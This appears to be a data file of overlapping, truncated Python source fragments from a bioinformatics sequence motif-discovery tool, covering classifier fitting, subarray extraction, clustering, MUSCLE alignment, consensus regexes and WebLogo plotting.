"plt.title(needle) plt.xlabel('Position') plt.ylabel('Num occurrences') if fname: plt.draw() figname = '%s_loc_%d.png' % (fname, cluster_id)",
"multiprocess_fit(pos_iterable, neg_iterable, vectorizer=None, estimator=None, pos_block_size=100, neg_block_size=100, n_jobs=-1): \"\"\"multiprocess_fit.\"\"\" start_time = time.time() classes =",
"diags self.maxiters = maxiters self.maxhours = maxhours if alphabet == 'protein': self.alphabet =",
"c_j distances[(i, j)].append(selected) cooccurence_mtx = np.nan_to_num(cooccurence_mtx) orig_cooccurence_mtx = cooccurence_mtx.copy() cooccurence_list = [] for",
"start_time = time.time() classes = np.array([1, -1]) if n_jobs == -1: pool =",
"match.end() m = s + (e - s) / 2 locs.append(m) plt.figure(figsize=size) n,",
"def trim_seqs(seqs, smod, half_windw_size=7): \"\"\"trim_seqs.\"\"\" sig = cumulative_score(seqs, smod) val, start, end, width",
"np.array([1, -1]) if n_jobs == -1: pool = mp.Pool() else: pool = mp.Pool(n_jobs)",
"\\ (cluster_id, motives[cluster_id]['consensus_seq']) txt.append(info) for freq, cluster_id in sorted([(motives[i]['freq'], i) for i in",
"1): start = ids[i] end = ids[i + 1] width = end -",
"parametrized sigmoid on the empirical cumulative distribution.\"\"\" def __init__(self, random_state=1): \"\"\"Constructor.\"\"\" self.random_state =",
"+ ':' new_header += str(end) + '<loc>' subsequences.append((new_header, subseq)) if not subsequences: raise",
"score in multiprocess_score(seqs, vectorizer=self.vectorizer, estimator=self.estimator, block_size=self.pos_block_size, n_jobs=self.n_jobs): yield score except Exception as e:",
"'-': to_be_removed.append(i) val = k[1][1] else: val = k[0][1] if float(val) / dim",
"np.hstack(true_targets) return preds, binary_preds, true_targets def serial_subarray(iterable, vectorizer=None, estimator=None, min_subarray_size=5, max_subarray_size=10): \"\"\"serial_subarray.\"\"\" annotated_seqs",
"True if self.maxhours is not None: params['maxhours'] = self.maxhours muscle_cline = MuscleCommandline(**params) stdout,",
"logo_range=list(), # composition = 'auto', scale_stack_widths=True, error_bars=True, title='', figure_label='', show_x_axis=True, x_label='', show_y_axis=True, y_label='',",
"loc = header.split('<loc>')[1] begin, end = loc.split(':') begin = int(begin) end = int(end)",
"= np.array(str_list, dtype=np.dtype('a')) cluster.append(concat_str) cluster = np.vstack(cluster) seq = '' for i, row",
"!= cluster_id: regex_j = motives[j]['regex_seq'] ds = distances[(cluster_id, j)] info = ' -",
"def letter_regex(k, size, regex_th=0.3): \"\"\"letter_regex.\"\"\" code = [] for letter, count in k:",
"begin, end, p, subseq in iterable: new_header = header new_header += '<loc>' +",
"self.clusters except Exception as e: logger.debug('Failed iteration. Reason: %s' % e) logger.debug('Exception', exc_info=True)",
"in motives: regex_i = motives[i]['regex_seq'] if j != cluster_id: regex_j = motives[j]['regex_seq'] ds",
"for subarray in subarrays: subseq_seq = subarray['subarray_string'] begin = subarray['begin'] end = subarray['end']",
"d_loc_time)) pool.close() pool.join() data_matrix = vstack(matrices) return data_matrix def multiprocess_fit(pos_iterable, neg_iterable, vectorizer=None, estimator=None,",
"show_ends=False, # ['auto','base','pairing','charge','chemistry','classic','monochrome'] color_scheme='classic', resolution=96, fineprint='', ): \"\"\"Initialize an instance.\"\"\" options = wbl.LogoOptions()",
"min_score=min_score, min_freq=min_freq, min_cluster_size=min_cluster_size, regex_th=regex_th, sample_size=sample_size) motives = self.merge( motives, similarity_th=similarity_th, min_score=min_score, min_freq=min_freq, min_cluster_size=min_cluster_size,",
"%d' % (co) txt.append(info) info = ' - freq of occurrences of regex:",
"= ecdf(scores) popt, pcov = curve_fit(sigmoid, xs, ys) self.a, self.b = popt else:",
"as e: logger.debug('Failed iteration. Reason: %s' % e) logger.debug('Exception', exc_info=True) def decomposition_scores(self, seqs=None):",
"pool = mp.Pool(n_jobs) results = [apply_async( pool, serial_pre_process, args=(seqs, vectorizer)) for seqs in",
"if motives.get(i, None) and motives.get(j, None): n_i = len(motives[i]['seqs']) n_j = len(motives[j]['seqs']) seqs",
"- freq of occurrences of regex: %.2f' % (fr) txt.append(info) av = motives[cluster_id]['avg_pos']",
"output_type=output_type)) for j in motives: regex_i = motives[i]['regex_seq'] if j != cluster_id: regex_j",
"__init__(self, complexity=5, n_clusters=10, min_subarray_size=4, max_subarray_size=10, estimator=SGDClassifier(warm_start=True), class_estimator=SGDClassifier(), clusterer=MiniBatchKMeans(), pos_block_size=300, neg_block_size=300, n_jobs=-1): \"\"\"Construct.\"\"\" self.complexity",
"estimator=None, block_size=100, n_jobs=-1): \"\"\"multiprocess_score.\"\"\" start_time = time.time() if n_jobs == -1: pool =",
"value): \"\"\"pvalue.\"\"\" y = sigmoid(value, self.a, self.b) p_val = 1 - y return",
"self.options.sequence_type is 'rna': alphabet = Alphabet('ACGU') elif self.options.sequence_type is 'protein': alphabet = Alphabet('ACDEFGHIKLMNPQRSTVWY')",
"int(begin), int(end), i) def compute_cooccurence(motives, ids=None): \"\"\"compute_cooccurence.\"\"\" if ids is None: ids =",
"\"\"\"Carry out alignment.\"\"\" headers, data = self._seq_to_stdin_fasta(seqs) stdout = self._perform_ma(data) aligned_seqs = self._fasta_to_seqs(headers,",
"' - consensus regex: %s' % motif['regex_seq'] logo_txt.append(info) return logo_image, logo_txt def compute_logos(self,",
"= np.sort(x) ys = np.arange(1, len(xs) + 1) / float(len(xs)) return xs, ys",
"Counter from sklearn import metrics from eden.util.NeedlemanWunsh import edit_distance import random import pylab",
"= np.percentile(locs, 70) - np.percentile(locs, 30) else: avg_loc = -1 std_loc = 0",
"in k: if count / float(size) > regex_th: if letter != '-': code.append(letter)",
"s + (e - s) / 2 locs.append(m) if locs: avg_loc = np.percentile(locs,",
"p_val = 1 - y return p_val def compute_clusters(self, seqs=None, p_value=0.05): \"\"\"compute_clusters.\"\"\" try:",
"def extract_location(needle, haystack): \"\"\"extract_location.\"\"\" locs = [] for h, s in haystack: for",
"counts, float(counts) / size def extract_consensus(seqs, motives, regex_th): \"\"\"extract_consensus.\"\"\" for id in motives:",
"Alphabet('ACDEFGHIKLMNPQRSTVWY') else: alphabet = Alphabet('AGCT') motif_corebio = SeqList(alist=instances, alphabet=alphabet) data = wbl.LogoData().from_seqs(motif_corebio) format",
"matrix K cluster_vecs = Vectorizer(complexity).transform(cluster_seqs) gram_matrix = metrics.pairwise.pairwise_kernels( cluster_vecs, metric='linear') c = linkage(gram_matrix,",
"\"\"\"chunks.\"\"\" iterable = iter(iterable) while True: items = [] for i in range(n):",
"locs, nbins, normed=0, facecolor='blue', alpha=0.3) plt.grid() plt.title(needle) plt.xlabel('Position') plt.ylabel('Num occurrences') if fname: plt.draw()",
"max_subarray_size=10, block_size=100, n_jobs=-1): \"\"\"multiprocess_subarray.\"\"\" start_time = time.time() if n_jobs == -1: pool =",
"locs.append(m) plt.figure(figsize=size) n, bins, patches = plt.hist( locs, nbins, normed=0, facecolor='blue', alpha=0.3) plt.grid()",
"= sigs + sig[:median_len] sig = np.array(sigs) / float(len(seqs)) return sig def trim_seqs(seqs,",
"y_label='', y_axis_tic_spacing=1.0, show_ends=False, # ['auto','base','pairing','charge','chemistry','classic','monochrome'] color_scheme='classic', resolution=96, fineprint='', ): \"\"\"Initialize an instance.\"\"\" options",
"gap_penalty=-1) rel_nw_score = 2 * nw_score / (len(seq_i) + len(seq_j)) if rel_nw_score >",
"in seqs_summary[seq_id]: centers[cluster_id].append(begin + (end - begin) / 2) cluster_ids = set(cluster_ids) for",
"= 'classic' wb = Weblogo(output_format='png', sequence_type=alphabet, resolution=200, stacks_per_line=60, units='bits', color_scheme=color_scheme) logo_image = wb.create_logo(seqs=motif['trimmed_align_seqs'])",
"report(self, pos_seqs, all_seqs, motives, nbins=40, size=(17, 2), output_type='screen', fname=None): \"\"\"Report in markdown format.\"\"\"",
"width def cumulative_score(seqs, smod): \"\"\"cumulative_score.\"\"\" median_len = np.median([len(s) for h, s in seqs])",
"= ' - num subarrays: %d' % len(motif['seqs']) logo_txt.append(info) info = ' -",
"= -4, 1 scores = [score for header, score, begin, end, subseq in",
"= time.time() preds = [] binary_preds = [] true_targets = [] for i,",
"in align_seq] concat_str = np.array(str_list, dtype=np.dtype('a')) cluster.append(concat_str) cluster = np.vstack(cluster) size = len(trimmed_align_seqs)",
"n, bins, patches = plt.hist( locs, nbins, normed=0, facecolor='blue', alpha=0.3) plt.grid() plt.title(needle) plt.xlabel('Position')",
"seq def _compute_score(self, align_seqs, min_freq=0.8): dim = len(align_seqs) cluster = [] for h,",
"seq, score in annotated_seqs] return scores def multiprocess_score(iterable, vectorizer=None, estimator=None, block_size=100, n_jobs=-1): \"\"\"multiprocess_score.\"\"\"",
"BaseEstimator, ClassifierMixin from sklearn.linear_model import SGDClassifier from sklearn.cluster import MiniBatchKMeans from eden.sequence import",
"n_jobs=self.n_jobs) # confusion matrix cm = metrics.confusion_matrix(y_test, y_binary) np.set_printoptions(precision=2) logger.info('Confusion matrix:') logger.info(cm) #",
"params: a:%.2f b:%.2f' % (self.a, self.b)) def predict(self, value): \"\"\"pvalue.\"\"\" y = sigmoid(value,",
"show_y_axis=True, y_label='', y_axis_tic_spacing=1.0, show_ends=False, # ['auto','base','pairing','charge','chemistry','classic','monochrome'] color_scheme='classic', resolution=96, fineprint='', ): \"\"\"Initialize an instance.\"\"\"",
"logger.debug('Performance evaluation') start_time = time.time() preds = [] binary_preds = [] true_targets =",
"if p <= p_value: yield orig_header, begin, end, p, subseq except Exception as",
"block_size=self.pos_block_size, n_jobs=self.n_jobs): yield score except Exception as e: logger.debug('Failed iteration. Reason: %s' %",
"len(motives) txt.append(info) figname = plot_cumulative_score( self, pos_seqs, size=size, fname=fname) txt.append(self._wrap_image(figname, output_type=output_type)) for freq,",
"x): \"\"\"Empirical cumulative distribution function.\"\"\" xs = np.sort(x) ys = np.arange(1, len(xs) +",
"'<score>%.4f<score>' % (score) header += '<subseq>%s<subseq>' % (subseq_seq) subseq = (header, seq) subseqs.append(subseq)",
"in enumerate(results): loc_start_time = time.time() pos_data_matrix = p.get() matrices += pos_data_matrix d_time =",
"(#%d) (%.2f secs)' % (cluster_id, len(clusters[cluster_id]), dtime)) logger.debug('After motives computation, %d motives' %",
"1 scores = [score for header, score, begin, end, subseq in self.decomposition_scores(seqs)] if",
"start = ids[i] end = ids[i + 1] width = end - start",
"joblib.dump(self, model_name, compress=1) def load(self, obj): \"\"\"load.\"\"\" self.__dict__.update(joblib.load(obj).__dict__) def fit(self, pos_seqs=None, neg_seqs=None): \"\"\"fit.\"\"\"",
"neg_block_size=100, n_jobs=-1): \"\"\"multiprocess_performance.\"\"\" start_time = time.time() if n_jobs == -1: pool = mp.Pool()",
"of regex: %d' % (co) txt.append(info) info = ' - freq of occurrences",
"h, align_seq in trimmed_align_seqs: str_list = [c for c in align_seq] concat_str =",
"code[0] else: code_str = '(' + '|'.join(code) + ')' return code_str def consensus_regex(trimmed_align_seqs,",
"for c in align_seq] concat_str = np.array(str_list, dtype=np.dtype('a')) cluster.append(concat_str) cluster = np.vstack(cluster) seq",
"return motives def compute_logo(self, cluster_id=None, motif=None): \"\"\"compute_logo.\"\"\" alphabet = 'rna' color_scheme = 'classic'",
"in iterable: new_header = header new_header += '<loc>' + str(begin) + ':' new_header",
"in enumerate(cooccurence_mtx): norm = row[i] if norm != 0: row /= norm else:",
"facecolor='green', alpha=0.3) plt.grid() plt.title('%s vs %s' % (regex_i, regex_j)) plt.xlabel('Relative position') plt.ylabel('Num occurrences')",
"(delta: %.2f)' % (i, size, d_time, d_loc_time)) pool.close() pool.join() preds = np.hstack(preds) binary_preds",
"= True dtime = time.time() - start_time logger.debug('...done in %.2f secs' % (dtime))",
"subseq in iterable: new_header = header new_header += '<loc>' + str(begin) + ':'",
"block_size)] logger.debug('Setup %.2f secs' % (time.time() - start_time)) logger.debug('Predicting') start_time = time.time() scores_items",
"logo to compute. Try more permissive parameters.') def _save_logo(self, logo, cluster_id, fname): imagename",
"subarray was selected. Increase p_value.') logger.debug('Working on: %d fragments' % len(subsequences)) n =",
"if y_label: options.yaxis_label = y_label options.yaxis_tic_interval = y_axis_tic_spacing options.show_ends = show_ends options.color_scheme =",
"False for rel_nw_score, i, j in ms: if motives.get(i, None) and motives.get(j, None):",
"\"\"\"consensus_regex.\"\"\" cluster = [] for h, align_seq in trimmed_align_seqs: str_list = [c for",
"def __init__(self, diags=False, maxiters=16, maxhours=None, # TODO: check if this alphabet is required",
"complexity=3): sep = ' ' * (complexity * 2) # join all sequences",
"serial_pre_process, args=(seqs, vectorizer)) for seqs in chunks(neg_iterable, neg_block_size)] logger.debug('Setup %.2f secs' % (time.time()",
"figure_label: options.logo_label = figure_label options.show_xaxis = show_x_axis if x_label: options.xaxis_label = x_label options.show_yaxis",
"alpha=0.3, color='r') plt.grid() plt.xlabel('Position') plt.ylabel('Importance score') if fname: plt.draw() figname = '%s_importance.png' %",
"'auto', scale_stack_widths=True, error_bars=True, title='', figure_label='', show_x_axis=True, x_label='', show_y_axis=True, y_label='', y_axis_tic_spacing=1.0, show_ends=False, # ['auto','base','pairing','charge','chemistry','classic','monochrome']",
"if i != j: # find closest instance j from any instance in",
"sklearn import metrics from eden.util.NeedlemanWunsh import edit_distance import random import pylab as plt",
"import joblib from scipy.optimize import curve_fit import multiprocessing logger = logging.getLogger(__name__) def sigmoid(x,",
"on the empirical cumulative distribution.\"\"\" def __init__(self, random_state=1): \"\"\"Constructor.\"\"\" self.random_state = random_state self.a",
"if self.clusterer_is_fit: preds = self.class_estimator.predict(data_matrix) else: preds = self.clusterer.fit_predict(data_matrix) self.class_estimator.fit(data_matrix, preds) self.clusterer_is_fit =",
"on %d instances' % data_matrix.shape[0]) start_time = time.time() self.clusterer.set_params(n_clusters=self.n_clusters) if self.clusterer_is_fit: preds =",
"logger.debug('Exception', exc_info=True) def _order_clusters(self, clusters, complexity=3): sep = ' ' * (complexity *",
">= min_score and len(align_seqs) > min_cluster_size: return True else: return False def compute_motif(self,",
"import Seq from Bio.SeqRecord import SeqRecord from corebio.seq import Alphabet, SeqList import weblogolib",
"import pylab as plt import joblib from scipy.optimize import curve_fit import multiprocessing logger",
"return orders def _compute_consensus_seq(self, align_seqs): cluster = [] for h, align_seq in align_seqs:",
"avg_loc = np.percentile(locs, 50) std_loc = np.percentile(locs, 70) - np.percentile(locs, 30) else: avg_loc",
"in chunks(pos_iterable, pos_block_size)] neg_results = [apply_async( pool, serial_pre_process, args=(seqs, vectorizer)) for seqs in",
"= [a for i, a in enumerate(align_seq) if i not in to_be_removed] trimmed_align_seqs.append((h,",
"subarrays_items += subseqs return subarrays_items def multiprocess_subarray(iterable, vectorizer=None, estimator=None, min_subarray_size=5, max_subarray_size=10, block_size=100, n_jobs=-1):",
"return self except Exception as e: logger.debug('Failed iteration. Reason: %s' % e) logger.debug('Exception',",
"# ['protein','dna','rna'] ignore_lower_case=False, # ['bits','nats','digits','kT','kJ/mol','kcal/mol','probability'] units='bits', first_position=1, logo_range=list(), # composition = 'auto', scale_stack_widths=True,",
"# align with muscle is_high_quality, motif = self.compute_motif( seqs=clusters[cluster_id], min_score=min_score, min_freq=min_freq, min_cluster_size=mcs, regex_th=regex_th,",
"Counter(row) k = c.most_common() l = letter_regex(k, size, regex_th=regex_th) if l: code +=",
"min_subarray_size=5, max_subarray_size=10): \"\"\"serial_subarray.\"\"\" annotated_seqs = vectorizer.annotate(iterable, estimator=estimator) subarrays_items = [] for (orig_header, orig_seq),",
"clusters.') mcs = min_cluster_size logger.debug('Alignment') motives = dict() for cluster_id in clusters: start_time",
"(fname, cluster_id) plt.savefig( figname, bbox_inches='tight', transparent=True, pad_inches=0) else: figname = None plt.show() plt.close()",
"begin = int(begin) end = int(end) subseq = header.split('<subseq>')[1] orig_header = header.split('<loc>')[0] return",
"= std if freq_th is None or freq >= freq_th: if std_th is",
"c_regex, counts, motives[id]['consensus_seq'] def plot_location(needle, haystack, cluster_id=None, nbins=20, size=(17, 2), fname=None): \"\"\"plot_location.\"\"\" locs",
"':' new_header += str(end) + '<loc>' subsequences.append((new_header, subseq)) if not subsequences: raise Exception('No",
"/ float(len(xs)) return xs, ys def fit(self, scores): \"\"\"fit.\"\"\" if scores: xs, ys",
"= compute_cooccurence(motives) info = '### Summary: %d motives' % len(motives) txt.append(info) figname =",
"neg_data_matrix]) pred = estimator.decision_function(data_matrix) preds.append(pred) binary_pred = estimator.predict(data_matrix) binary_preds.append(binary_pred) d_time = time.time() -",
"len(motives[i]['seqs']) n_j = len(motives[j]['seqs']) seqs = motives[i]['seqs'] + motives[j]['seqs'] is_high_quality, motif = self.compute_motif(",
"for i in ids: for h, s in motives[i]['seqs']: tokens = h.split('<loc>') seq_id",
"sig[:median_len] else: if len(sig) >= median_len: sigs = sigs + sig[:median_len] sig =",
"- start_time d_loc_time = time.time() - loc_start_time logger.debug('%d (%.2f secs) (delta: %.2f)' %",
"motives[cluster_id]['regex_seq'] figname = plot_location( regex_i, all_seqs, cluster_id=cluster_id, nbins=nbins, size=size, fname=fname) txt.append(self._wrap_image(figname, output_type=output_type)) for",
"n_i = len(motives[i]['seqs']) n_j = len(motives[j]['seqs']) seqs = motives[i]['seqs'] + motives[j]['seqs'] is_high_quality, motif",
"or std <= std_th: _motives[cluster_id] = motives[cluster_id] if len(_motives) == 0: logger.warning('Quality filter",
"for h, s in seqs]) sigs = None for scores in smod.score(seqs): sig",
"' - freq of occurrences of regex: %.2f' % (fr) txt.append(info) av =",
"j != cluster_id: regex_j = motives[j]['regex_seq'] ds = distances[(cluster_id, j)] info = '",
"scipy.optimize import curve_fit import multiprocessing logger = logging.getLogger(__name__) def sigmoid(x, a, b): \"\"\"sigmoid.\"\"\"",
"create_logo(self, seqs=[]): \"\"\"Create sequence logo for input sequences.\"\"\" # seperate headers headers, instances",
"self.compute_motif( seqs=clusters[cluster_id], min_score=min_score, min_freq=min_freq, min_cluster_size=mcs, regex_th=regex_th, sample_size=sample_size) if is_high_quality: motives[cluster_id] = motif dtime",
"'png_print': return wbl.png_print_formatter(data, format) elif self.output_format == 'jpeg': return wbl.jpeg_formatter(data, format) else: return",
"trimmed_align_seqs.append((h, ''.join(trimmed_align_seq))) return score, trimmed_align_seqs def _is_high_quality(self, seqs, min_score=4, min_freq=0.6, min_cluster_size=10, sample_size=200): ma",
"output_type=output_type)) for freq, cluster_id in sorted([(motives[i]['freq'], i) for i in motives], reverse=True): info",
"ys def letter_regex(k, size, regex_th=0.3): \"\"\"letter_regex.\"\"\" code = [] for letter, count in",
"def transform(self, seqs=[]): \"\"\"Carry out alignment.\"\"\" headers, data = self._seq_to_stdin_fasta(seqs) stdout = self._perform_ma(data)",
"return figname def mean_shift_decomposition(sig, half_windw_size=5): \"\"\"mean_shift_decomposition.\"\"\" sig_len = len(sig) for i in range(half_windw_size,",
"dtime = time.time() - start_time logger.debug( 'Cluster %d (#%d) (%.2f secs)' % (cluster_id,",
"size, d_time, d_loc_time)) pool.close() pool.join() data_matrix = vstack(matrices) return data_matrix def multiprocess_fit(pos_iterable, neg_iterable,",
"%d values' % (len(scores))) logger.debug('Optimal params: a:%.2f b:%.2f' % (self.a, self.b)) def compute_p_value(self,",
"(seq, score) in zip(iterable, annotated_seqs): subarrays = compute_max_subarrays_sequence( seq=seq, score=score, min_subarray_size=min_subarray_size, max_subarray_size=max_subarray_size, margin=1,",
"new_header = header new_header += '<loc>' + str(begin) + ':' new_header += str(end)",
"permissive parameters.') def _save_logo(self, logo, cluster_id, fname): imagename = '%s_logo_cl_%d.png' % (fname, cluster_id)",
"str(begin) + ':' new_header += str(end) + '<loc>' subsequences.append((new_header, subseq)) if not subsequences:",
"' - consensus sequence: %s' % motif['consensus_seq'] logo_txt.append(info) info = ' - consensus",
"seq_id = tokens[0] begin, end = tokens[1].split(':') yield (seq_id, int(begin), int(end), i) def",
"value): \"\"\"p_value.\"\"\" y = sigmoid(value, self.a, self.b) p_val = 1 - y return",
"norm != 0: row /= norm else: row = np.zeros(row.shape) row[i] = 0",
"classes = np.array([1, -1]) if n_jobs == -1: pool = mp.Pool() else: pool",
"import compute_max_subarrays_sequence from itertools import izip import time from sklearn.base import BaseEstimator, ClassifierMixin",
"'<loc>' subsequences.append((new_header, subseq)) if not subsequences: raise Exception('No subarray was selected. Increase p_value.')",
"if selected_abs == abs(c_i - c_j): selected = c_i - c_j distances[(i, j)].append(selected)",
"(regex_i, regex_j)) plt.xlabel('Relative position') plt.ylabel('Num occurrences') if fname: plt.draw() figname = '%s_dist_%d_vs_%d.png' %",
"elif self.options.sequence_type is 'protein': alphabet = Alphabet('ACDEFGHIKLMNPQRSTVWY') else: alphabet = Alphabet('AGCT') motif_corebio =",
"strict. Ignoring filter.') return motives else: logger.debug('After quality filter, %d motives' % len(_motives))",
"estimator=self.estimator, min_subarray_size=self.min_subarray_size, max_subarray_size=self.max_subarray_size, block_size=self.pos_block_size, n_jobs=self.n_jobs) for header, seq in subarrays_items: components = self._decompose_header(header)",
"if len(sig) >= median_len: sigs = sig[:median_len] else: if len(sig) >= median_len: sigs",
"Bio.Seq import Seq from Bio.SeqRecord import SeqRecord from corebio.seq import Alphabet, SeqList import",
"s, overlapped=True) if len(matches): yield 1 else: yield 0 def occurrences(needle, haystack): \"\"\"occurrences.\"\"\"",
"= line.split() if line_str: seq += str(line_str[0]).strip() if seq: yield seq # ------------------------------------------------------------------------------",
"headers, data = self._seq_to_stdin_fasta(seqs) stdout = self._perform_ma(data) aligned_seqs = self._fasta_to_seqs(headers, stdout) return aligned_seqs",
"% (time.time() - start_time)) logger.debug('Vectorizing') start_time = time.time() matrices = [] for i,",
"options.unit_name = units options.first_index = first_position if logo_range: options.logo_start = logo_range[0] options.logo_end =",
"clustering, %d motives' % len(self.clusters)) return self.clusters except Exception as e: logger.debug('Failed iteration.",
"len(sig) for i in range(half_windw_size, sig_len - half_windw_size): min_sig = np.min(sig[i - half_windw_size:i",
"serial_subarray, args=(seqs, vectorizer, estimator, min_subarray_size, max_subarray_size)) for seqs in chunks(iterable, block_size)] logger.debug('Setup %.2f",
"iter(iterable) while True: items = [] for i in range(n): it = iterable.next()",
"in sorted(seqs_summary): cluster_ids = [cluster_id for begin, end, cluster_id in seqs_summary[seq_id]] centers =",
"min_cluster_size: return True else: return False def compute_motif(self, seqs=None, min_score=4, min_freq=0.6, min_cluster_size=10, regex_th=.3,",
"definition logger.debug('After merge, %d motives' % len(motives)) return motives def quality_filter(self, seqs=None, motives=None,",
"logo_image, logo_txt = self.compute_logo( cluster_id=cluster_id, motif=motives[cluster_id]) logos[cluster_id] = (logo_image, logo_txt) return logos else:",
"def create_logo(self, seqs=[]): \"\"\"Create sequence logo for input sequences.\"\"\" # seperate headers headers,",
"cluster_id, j, regex_i, regex_j, distances, nbins=nbins, size=size, fname=fname) txt.append(self._wrap_image( figname, output_type=output_type)) txt.append('_' *",
"mp.Pool() else: pool = mp.Pool(n_jobs) pos_results = [apply_async( pool, serial_pre_process, args=(seqs, vectorizer)) for",
"scores_items = [] for i, p in enumerate(results): loc_start_time = time.time() scores =",
"SeqRecord from corebio.seq import Alphabet, SeqList import weblogolib as wbl from scipy.cluster.hierarchy import",
"cluster_ids: for j in cluster_ids: cooccurence_mtx[i, j] += 1 if i != j:",
"len(clusters[cluster_id]) > 0: seqs = [s for h, s in clusters[cluster_id]] seq =",
"nw_score / (len(seq_i) + len(seq_j)) if rel_nw_score > similarity_th: yield rel_nw_score, i, j",
"self._perform_ma(data) aligned_seqs = self._fasta_to_seqs(headers, stdout) return aligned_seqs # ------------------------------------------------------------------------------ class Weblogo(object): \"\"\"A wrapper",
"if seq: yield seq seq = \"\" line_str = str(line) yield line_str.strip() else:",
"for cluster_id in ids: logo_image, logo_txt = self.compute_logo( cluster_id=cluster_id, motif=motives[cluster_id]) logos[cluster_id] = (logo_image,",
"= Counter(row) k = c.most_common() code = '' for i, row in enumerate(cluster.T):",
"min_freq=0.8): dim = len(align_seqs) cluster = [] for h, align_seq in align_seqs: str_list",
"size=(17, 2), fname=None): \"\"\"plot_location.\"\"\" locs = [] for h, s in haystack: for",
"from sklearn import metrics from eden.util.NeedlemanWunsh import edit_distance import random import pylab as",
"= [] for i, p in enumerate(results): loc_start_time = time.time() scores = p.get()",
"logger.debug(info1 + info2) # update motives motives[i] = motif del motives[j] success =",
"occurrences(c_regex, seqs) yield freq, id, c_regex, counts, motives[id]['consensus_seq'] def plot_location(needle, haystack, cluster_id=None, nbins=20,",
"np.percentile(locs, 30) else: avg_loc = -1 std_loc = 0 return avg_loc, std_loc def",
"seqs in chunks(neg_iterable, neg_block_size)] logger.debug('Setup %.2f secs' % (time.time() - start_time)) logger.debug('Performance evaluation')",
"motives' % len(motives)) return motives def quality_filter(self, seqs=None, motives=None, freq_th=None, std_th=None): \"\"\"quality_filter.\"\"\" _motives",
"multiprocess_vectorize( subsequences, vectorizer=self.vectorizer, pos_block_size=pos_block_size, n_jobs=self.n_jobs) logger.debug('Clustering') logger.debug('working on %d instances' % data_matrix.shape[0]) start_time",
"= wbl.LogoData().from_seqs(motif_corebio) format = wbl.LogoFormat(data, self.options) if self.output_format == 'png': return wbl.png_formatter(data, format)",
"%d (#%d) score: %.2f' % \\ (i, n_i, j, n_j, rel_nw_score) info2 =",
"True else: return False def compute_motif(self, seqs=None, min_score=4, min_freq=0.6, min_cluster_size=10, regex_th=.3, sample_size=200): \"\"\"compute_motif.\"\"\"",
"+ (e - s) / 2 locs.append(m) plt.figure(figsize=size) n, bins, patches = plt.hist(",
"row = np.zeros(row.shape) row[i] = 0 cooccurence_list.append(row) norm_cooccurence_mtx = np.vstack(cooccurence_list) return orig_cooccurence_mtx, norm_cooccurence_mtx,",
"/ 2 locs.append(m) plt.figure(figsize=size) n, bins, patches = plt.hist( locs, nbins, normed=0, facecolor='blue',",
"pool = mp.Pool(n_jobs) results = [apply_async( pool, serial_score, args=(seqs, vectorizer, estimator)) for seqs",
"in motives[i]['seqs']: tokens = h.split('<loc>') seq_id = tokens[0] begin, end = tokens[1].split(':') yield",
"logger.debug('Exception', exc_info=True) def performance(self, pos_seqs=None, neg_seqs=None): \"\"\"performance.\"\"\" try: y_pred, y_binary, y_test = multiprocess_performance(",
"seqs) motives[cluster_id]['freq'] = freq motives[cluster_id]['counts'] = counts avg, std = extract_location(regex_seq, seqs) motives[cluster_id]['avg_pos']",
"'protein': self.alphabet = IUPAC.protein elif alphabet == 'rna': self.alphabet = IUPAC.unambiguous_rna else: self.alphabet",
"size def extract_consensus(seqs, motives, regex_th): \"\"\"extract_consensus.\"\"\" for id in motives: c_regex = consensus_regex(motives[id]['trimmed_align_seqs'],",
"self.a, self.b) p_val = 1 - y return p_val def compute_clusters(self, seqs=None, p_value=0.05):",
"seqs=seqs, min_score=min_score, min_freq=min_freq, min_cluster_size=min_cluster_size, regex_th=regex_th, sample_size=sample_size) if is_high_quality: info1 = 'Joining: %d (#%d),",
"data_matrix = multiprocess_vectorize( subsequences, vectorizer=self.vectorizer, pos_block_size=pos_block_size, n_jobs=self.n_jobs) logger.debug('Clustering') logger.debug('working on %d instances' %",
"values' % (len(scores))) logger.debug('Optimal params: a:%.2f b:%.2f' % (self.a, self.b)) def predict(self, value):",
"- half_windw_size:i + half_windw_size]) if min_sig == sig[i]: yield i def box_decomposition(sig, half_windw_size=5):",
"% (time.time() - start_time)) logger.debug('Fitting') start_time = time.time() for i, (p, n) in",
"- start_time logger.debug( 'Cluster %d (#%d) (%.2f secs)' % (cluster_id, len(clusters[cluster_id]), dtime)) logger.debug('After",
"y_label: options.yaxis_label = y_label options.yaxis_tic_interval = y_axis_tic_spacing options.show_ends = show_ends options.color_scheme = wbl.std_color_schemes[color_scheme]",
"fineprint: options.fineprint = fineprint self.options = options self.output_format = output_format def create_logo(self, seqs=[]):",
"align_seq in trimmed_align_seqs: str_list = [c for c in align_seq] concat_str = np.array(str_list,",
"cluster_id_j)] plt.figure(figsize=size) n, bins, patches = plt.hist( ds, nbins, normed=0, facecolor='green', alpha=0.3) plt.grid()",
"return data_matrix def multiprocess_fit(pos_iterable, neg_iterable, vectorizer=None, estimator=None, pos_block_size=100, neg_block_size=100, n_jobs=-1): \"\"\"multiprocess_fit.\"\"\" start_time =",
"self.vectorizer = Vectorizer(complexity=complexity, auto_weights=True, nbits=15) self.estimator = estimator self.class_estimator = class_estimator self.clusterer =",
"# ------------------------------------------------------------------------------ def serial_pre_process(iterable, vectorizer=None): \"\"\"serial_pre_process.\"\"\" data_matrix = vectorizer.transform(iterable) return data_matrix def chunks(iterable,",
"1 - y return p_val def ecdf(x): \"\"\"Empirical cumulative distribution function.\"\"\" xs =",
"p_val def ecdf(x): \"\"\"Empirical cumulative distribution function.\"\"\" xs = np.sort(x) ys = np.arange(1,",
"self.class_estimator.predict(data_matrix) else: preds = self.clusterer.fit_predict(data_matrix) self.class_estimator.fit(data_matrix, preds) self.clusterer_is_fit = True dtime = time.time()",
"metrics.confusion_matrix(y_test, y_binary) np.set_printoptions(precision=2) logger.info('Confusion matrix:') logger.info(cm) # classification logger.info('Classification:') logger.info(metrics.classification_report(y_test, y_binary)) # roc",
"sigmoid(x, a, b): \"\"\"sigmoid.\"\"\" return 1 / (1 + np.exp(-(x - a) /",
"'' for i, row in enumerate(cluster.T): c = Counter(row) k = c.most_common() seq",
"cluster.append(concat_str) cluster = np.vstack(cluster) score = 0 to_be_removed = [] for i, row",
"n_jobs self.vectorizer = Vectorizer(complexity=complexity, auto_weights=True, nbits=15) self.estimator = estimator self.class_estimator = class_estimator self.clusterer",
"half_windw_size=5): \"\"\"box_decomposition.\"\"\" ids = list(mean_shift_decomposition(sig, half_windw_size)) for i in range(len(ids) - 1): start",
